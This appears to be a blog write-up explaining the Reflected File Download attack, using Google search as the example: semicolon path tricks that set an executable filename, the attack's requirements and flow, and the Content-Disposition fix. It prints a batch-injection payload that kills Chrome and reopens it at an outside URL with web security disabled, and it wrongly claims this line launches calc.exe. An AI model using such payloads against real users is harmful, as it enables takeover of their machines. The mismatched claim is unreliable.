It allows file downloads from highly trusted domains such as Google.com and Bing.com without ever being uploaded. This is definitely something that we will probably see. The attack isn’t a JSON-specific attack but they are highly vulnerable.
Due to Google implementing a fix the file now downloads as a harmless txt file.
‘The URI specification defines the ability to send parameters in the path portion of the URI by inserting the semicolon character (before the query portion that starts with a question mark “?”).
If a web server accepts path parameters it does not really consider them to be a part of the path, which means we can inject any content, as it will be ignored. However, when it comes to determine the filename of a download the vast majority of Web browsers (all browsers but Safari) parse and set a filename from path parameters.’
- Internet Explorer and Firefox – Parsing the filename from https://example.com/api;/setup.bat results in “setup.bat”. Success.
- Chrome and Opera – Parsing the filename from https://example.com/api;/setup.bat results in m”api”. Everything after the semicolon is ignored. Well, not exactly, everything after the LAST semicolon is ignored. Parsing the filename from https://example.com/api;/setup.bat;ignored results in “setup.bat”.Success. So if we would like to support all of the above, it is possible to create a combination of (1) and (2):
- All browsers except Safari – Parsing the filename from https://example.com/api;/setup.bat;/setup.bat results in “setup.bat”. Success. Of course, that application specific URL parsing could lead to other characters acceptable as separators in the path portion of the URL.
For an RFD attack to be successful, there are three simple requirements:
- Reflected – some user input is being “reflected” to the response content. This is used to inject shell commands.
- Filename – the URL of the vulnerable site or API is permissive, and accepts additional input. This is often the case, and is used by attackers to set the extension of the file to an executable extension.
- Download – the response is being downloaded and a file is created “on-thefly” by the Web browser. The browser then sets the filename.
Having the ability to control some of the content that is returned by the server in the response body is crucial for an RFD exploit to be successful. This is where the attack payload is inserted – the actual content or commands that inflict damage to the client’s machine.
- Request Parameters
- Persistent Storage
- JSONP Callbacks
Content-Disposition Header – Mistake
A common implementation error of the Content-Disposition Header could result in Reflected File Download. Content-Disposition headers SHOULD include a “filename” parameter, to avoid having the browser parse the filename from the URL. Due to this Google APIs was vulnerable.
RFD Attack Flow
RFD, like many other Web attacks, begins by sending a malicious link to a victim. But like no others, RFD ends outside of the browser context:
- The user follows a malicious link to a trusted Web site.
- An executable file is downloaded and saved on the user’s machine. All security indicators show that the file was “hosted” on the trusted Web site.
- The user executes the file which contains shell commands that gain complete control over the computer.
Once you are able to break out of a batch string into shell context you can then inject commands to the OS.
The following wouldexecute the calc.exe on a windows machine
“||taskkill /F /IM ch*|md||start chrome pi.vu/B2jk –disable-web-security –disable-popup-blocking||
Burp Suite Analyses
Search Query using Google uses the value ‘q’ to search the user specified term, this is the param that is reflected back and used for the attack. ‘gs_ri = ‘Google Search Request ID – Not fully sure about this parameter yet but it is needed for the attack.
Due to Google implementing a fix the file now downloads as a harmless txt file
Done by adding Content-Disposition: attachment; filename=f.txt
Just as an example I converted the .txt file to a .bat file to show how it would execute if Google didn’t have its protection in place.